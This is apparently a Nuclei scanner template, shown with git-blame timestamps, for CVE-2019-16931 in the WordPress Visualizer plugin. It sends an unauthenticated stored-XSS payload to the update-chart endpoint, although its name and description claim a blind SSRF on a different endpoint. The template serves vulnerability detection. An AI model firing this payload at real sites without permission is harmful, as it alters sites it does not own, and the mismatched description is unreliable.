2022-05-11 06:26:12 +00:00
|
|
|
id: CVE-2019-16931
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
|
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
|
|
|
|
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
tags: wp-plugin,wordpress,wp,xss,unauth
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wp-json/visualizer/v1/update-chart HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
2022-05-23 11:51:05 +00:00
|
|
|
{"id": 7, "visualizer-chart-type": "<script>alert(document.domain)</script>"}
|
2022-05-11 06:26:12 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-05-23 11:51:05 +00:00
|
|
|
- '{"success":"Chart updated"}'
|
2022-05-11 06:26:12 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|